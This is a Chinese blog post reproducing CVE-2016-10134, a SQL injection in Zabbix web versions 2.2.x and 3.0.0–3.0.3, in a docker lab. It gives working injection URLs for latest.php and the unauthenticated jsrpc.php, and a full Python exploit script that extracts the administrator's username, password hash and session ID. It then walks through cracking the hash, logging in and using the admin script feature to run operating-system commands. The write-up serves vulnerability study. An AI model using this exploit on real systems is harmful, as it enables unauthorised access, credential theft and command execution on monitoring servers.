zabbix latest.php SQL注入漏洞(CVE-2016-10134)

zabbix latest.php SQL注入漏洞(CVE-2016-10134)

zabbix是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。

一.环境搭建

zabbix 2.2.x, 3.0.0-3.0.3版本存在SQL注入漏洞,攻击者无需授权登陆即可登陆zabbix管理系统,进入后台后script等功能直接获取zabbix服务器的操作系统权限。

攻击机IP:192.168.35.128
靶机IP: 192.168.35.143

二.启动运行环境

docker-compose up -d

在这里插入图片描述
执行命令后,将启动数据库(mysql)、zabbix server、zabbix agent、zabbix web。

查看容器状态

docker-compose ps

在这里插入图片描述

三.漏洞复现

访问地址 http://192.168.35.143:8080/

在这里插入图片描述
攻击机已知靶机ip,且靶机系统未关闭默认开启guest账户登陆。用账号guest(密码为空)登录。

在这里插入图片描述

登录成功后,查看cookie中 zbx_session,复制后16位字符

在这里插入图片描述

将这16个字符作为sid的值,访问
http://192.168.35.143:8080/latest.php?output=ajax&sid=489fdf79fa45813e&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0),可见成功注入:

在这里插入图片描述
这个漏洞也可以通过jsrpc.php触发,且无需登录:http://192.168.35.143:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0):

在这里插入图片描述

构造sql注入poc

import urllib2
import sys, os
import re

def deteck_Sql():
    u'检查是否存在 SQL 注入'
    payload = "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999'&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1"
    try:
        response = urllib2.urlopen(url + payload, timeout=10).read()
    except Exception, msg:
        print msg
    else:
        key_reg = re.compile(r"INSERT\s*INTO\s*profiles")
        if key_reg.findall(response):
            return True


def sql_Inject(sql):
    u'获取特定sql语句内容'
    payload = url + "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + urllib2.quote(
        sql) + "&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"
    try:
        response = urllib2.urlopen(payload, timeout=10).read()
    except Exception, msg:
        print msg
    else:
        result_reg = re.compile(r"Duplicate\s*entry\s*'~(.+?)~1")
        results = result_reg.findall(response)
        if results:
            return results[0]


if __name__ == '__main__':
    # os.system(['clear', 'cls'][os.name == 'nt'])
    print '+' + '-' * 60 + '+'
    print u'\t   Python Zabbix < 3.0.4 SQL 注入 Exploit'
    print '\t    Origin Author: http://www.waitalone.cn/'
    print '\t\t   Modified by: Jamin Zhang'
    print '\t\t   Date: 2016-08-18'
    print '+' + '-' * 60 + '+'
    if len(sys.argv) != 2:
        print u'用法: ' + os.path.basename(sys.argv[0]) + u' [Zabbix Server Web 后台 URL]'
        print u'实例: ' + os.path.basename(sys.argv[0]) + ' http://jaminzhang.github.io'
        sys.exit()
    url = sys.argv[1]
    if url[-1] != '/': url += '/'
    passwd_sql = "(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select concat(name,0x3a,passwd) from  users limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
    session_sql = "(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select sessionid from sessions limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
    if deteck_Sql():
        print u'Zabbix 存在 SQL 注入漏洞!\n'
        print u'管理员  用户名密码:%s' % sql_Inject(passwd_sql)
        print u'管理员  Session_id:%s' % sql_Inject(session_sql)
    else:
        print u'Zabbix 不存在 SQL 注入漏洞!\n'

执行EXP

在这里插入图片描述
得到账号密码,但是密码是加密的,可以在somd5上面进行解密,得到解密的密码。

在这里插入图片描述
使用得到的账号密码进行登录

或者使用获得的Sesssion_id,用burpsuite抓包修改也能登录
成功登录后台。

在这里插入图片描述
要想复现getshell,需要修改靶机的配置文件zabbix_agentd.conf中添加EnableRemoteCommands = 1,过程如下
查看当前运行容器CONTAINER ID

docker ps

进入到 cve-2016-10134_agent_1

在这里插入图片描述
添加 EnableRemoteCommands = 1,保存退出
在这里插入图片描述 尝试利用后台script功能获取其操作系统权限,在Administration页面的scrpit功能栏创建script

在此直接添加env查看环境变量

在这里插入图片描述
保存创建的script后依次点击Monitroing-Latest data,选择Host groups的select,全选
在这里插入图片描述

在这里插入图片描述

点击Fliter后鼠标右击Zabbix server,选择hacker运行后即可
在这里插入图片描述

参考链接

https://www.freebuf.com/sectool/241131.html

https://vulhub.org/#/environments/zabbix/CVE-2016-10134/

https://jaminzhang.github.io/security/Zabbix-latest-SQL-Injection-Vulnerability-and-EXP

https://blog.csdn.net/qq_43645782/article/details/106588179

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值